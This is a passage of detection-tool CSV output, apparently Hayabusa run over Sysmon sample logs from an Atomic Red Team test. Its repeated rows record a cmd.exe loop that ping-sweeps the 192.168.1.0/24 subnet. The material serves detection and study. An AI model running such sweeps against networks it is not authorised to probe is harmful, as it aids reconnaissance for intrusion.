192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.68 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.69 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.70 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.71 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.72 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.031 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.73 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.74 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.75 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.76 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.77 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.78 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.79 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.80 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.81 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.82 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.83 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.84 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.85 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:17.511 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.86 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.87 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.88 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.89 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.90 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.91 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.92 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.93 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:30.526 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:35.999 